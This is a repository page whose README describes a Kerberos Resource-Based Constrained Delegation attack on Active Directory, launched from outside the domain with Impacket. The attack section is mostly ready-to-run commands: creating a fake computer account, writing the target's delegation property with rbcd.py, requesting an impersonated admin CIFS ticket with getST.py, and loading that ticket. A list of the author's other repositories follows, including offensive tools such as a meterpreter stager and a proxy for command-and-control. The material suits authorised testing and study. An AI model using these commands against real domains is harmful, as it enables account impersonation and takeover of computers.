• Stars
    star
    487
  • Rank 90,352 (Top 2 %)
  • Language
    Python
  • Created over 4 years ago
  • Updated over 2 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Kerberos Resource-Based Constrained Delegation Attack from Outside using Impacket

Abusing Kerberos Resource-Based Constrained Delegation

TL;DR

This repo is about a practical attack against Kerberos Resource-Based Constrained Delegation in a Windows Active Directory Domain.

The difference from other common implementations is that we are launching the attack from outside of the Windows Domain, not from a domain joined (usually Windows) computer.

The attack is implemented using only Python3 Impacket (and its dependencies). Tested on Arch with up-to-date Impacket (0.9.21 as of writing).

Attack Log

The Attack

In summary, without any deep details, the attack targets a domain computer, exactly service principals related to the target domain computer.

What we need here as prerequisites:

  • a domain account with write access to the target computer (exactly write access to the msDS-AllowedToActOnBehalfOfOtherIdentity property of the target computer domain object)
  • permission to create new computer accounts (this is usually default, see MachineAccountQuota)
  • LDAP (389/tcp) and SAMR (445/tcp) (or LDAPS (636/tcp)) access to the DC.
  • Kerberos (88/tcp) access to the DC

The attack path in very high level:

  1. Create a fake computer
  2. Abuse msDS-AllowedToActOnBehalfOfOtherIdentity property of the target
  3. Request impersonated Service Tickets (S4U) for the target computer

Benefit:

  • Impersonated Service Tickets may allow high-level access to services on the target like CIFS, HTTP, etc, if the impersonated account has privileges. Sometimes takeover of the computer.

Common toolsets

The common toolsets for this attack operate on a domain-joined Windows Computer using:

Impacket implementation

This implementation uses pure Impacket from outside the Domain.

Creating the fake computer

Using addcomputer.py example from Impacket let's create a fake computer (called evilcomputer):

addcomputer.py -computer-name 'evilcomputer$' -computer-pass ev1lP@sS -dc-ip 192.168.33.203 ecorp.local/test:ohW9Lie0

Modifying delegation rights

Implemented the script rbcd.py found here in the repo which adds the related security descriptor of the newly created EVILCOMPUTER to the msDS-AllowedToActOnBehalfOfOtherIdentity property of the target computer.

./rbcd.py -f EVILCOMPUTER -t WEB -dc-ip 192.168.33.203 ecorp\\test:ohW9Lie0

The script uses heavily the Python classes in the ntlmrelayx.py Impacket example. For help and an example call the script without options.

Getting the impersonated service ticket

Now everything is ready for abusing the Constrained Delegation by an S4U2Self query and get an impersonated Service Ticket for the target computer. With getST.py Impacket example script:

getST.py -spn cifs/WEB.ecorp.local -impersonate admin -dc-ip 192.168.33.203 ecorp.local/EVILCOMPUTER$:ev1lP@sS

The above command fetches a CIFS Service Ticket on behalf of the targetted domain user admin and stores it in the file admin.ccache.

After adding the file path to the KRB5CCNAME variable the ticket is usable for Kerberos clients.

export KRB5CCNAME=`pwd`/admin.ccache
klist

References

For details about abusing Resource-Based Constrained Delegation:

And one of the most comprehensive presentations about Kerberos Attacks:

More Repositories

1

dll-hijack-by-proxying

Exploiting DLL Hijacking by DLL Proxying Super Easily
C
446
star
2

pwn-hisilicon-dvr

Python
351
star
3

ad-honeypot-autodeploy

Deploy a small, intentionally insecure, vulnerable Windows Domain for RDP Honeypot fully automatically.
Shell
251
star
4

serviceDetector

Detect whether a service is installed (blindly) and/or running (if exposing named pipes) on a remote machine without using local admin privileges.
Python
214
star
5

usbgadget-tool

Dumb USB HID gadget creator for Android (for triggering device driver install on Windows for LPE)
Shell
135
star
6

stager_libpeconv

A basic meterpreter protocol stager using the libpeconv library by hasherezade for reflective loading
C++
82
star
7

hs-dvr-telnet

open telnet port on modern HiSilicon devices
Python
51
star
8

log4shell-vulnerable-app

A Basic Java Application Vulnerable to the Log4Shell RCE
Java
38
star
9

ctfs

some example ctf writeups
HTML
27
star
10

azure-function-proxy

basic proxy as an azure function serverless app
Python
18
star
11

smtp2slack4qnap

Compact SMTP to HTTP Gateway (targeting Slack for QNAP-NAS notifications)
Python
14
star
12

kali-rpi-luks-crypt

Full disk encryption for Kali on Raspberry using LUKS
13
star
13

malicious-service

Minimal Windows Service Template for demonstrating privilege escalation via weak service executable permissions
C
12
star
14

malicious-hisilicon-scripts

Materials from my older (2018) HiSilicon research
Python
10
star
15

linkedin-auth-bypass

browse linkedin profiles without a registered account
JavaScript
10
star
16

SharpShot

Trivial .NET desktop capturing for Red Team operations
C#
6
star
17

Bundesnachrichtendienst

reversing / malware analysis recruitment challenge for German Federal Intelligence
6
star
18

gcstar-win32

standalone executable built from GCstar Perl release
6
star
19

issuu-dl

download pdf from issuu.com
Python
5
star
20

remotethermo

remotethermo.com API test
Python
4
star
21

lineageos-bullhead-build

Unofficial LineageOS builds for Google Nexus 5X "bullhead" devices
Shell
4
star
22

oauth-mitmproxy

oauth refresh_token client in mitmproxy
Python
4
star
23

nmap-http-screenshot

take screenshots of http services from an nmap xml output
Perl
3
star
24

railfence

a simple python implementation of the Rail Fence cipher (with offset support)
Python
3
star
25

sencor-bluetooth

Sample development Python scripts for reading data from the Sencor SWS 500 Outdoor Thermo/Humidity Meter Bluetooth LE device.
Python
2
star
26

riemann-nonconvex

Simulation of a totally asymmetric attractive interacting particle system
C
2
star
27

burp-Base64PostRequest

Burp Extension: Base64 decode / encode POST request data
Java
2
star
28

icinga2-plugins

customized plugins for icinga2
Shell
1
star
29

CryptoExamples

Crypto Examples for Java
Java
1
star
30

prosmart-mqtt

Minimal proSmart - MQTT Gateway
Python
1
star
31

malware-agenttesla

Brief Malware Analysis of an Agent Tesla variant
HTML
1
star
32

ringzer0team

https://ringzer0team.com
1
star
33

pyevtx-helpers

Some useful parsers for Windows EventLog (evtx) files using pyevtx
Python
1
star
34

php-mailinglist

php interface to mailing lists through web interface (e.q. ezmlm, qmailadmin)
PHP
1
star
35

azure-function-proxy-ng

Azure Function as a Reverse Proxy (e.g. for C2 ;) )
Python
1
star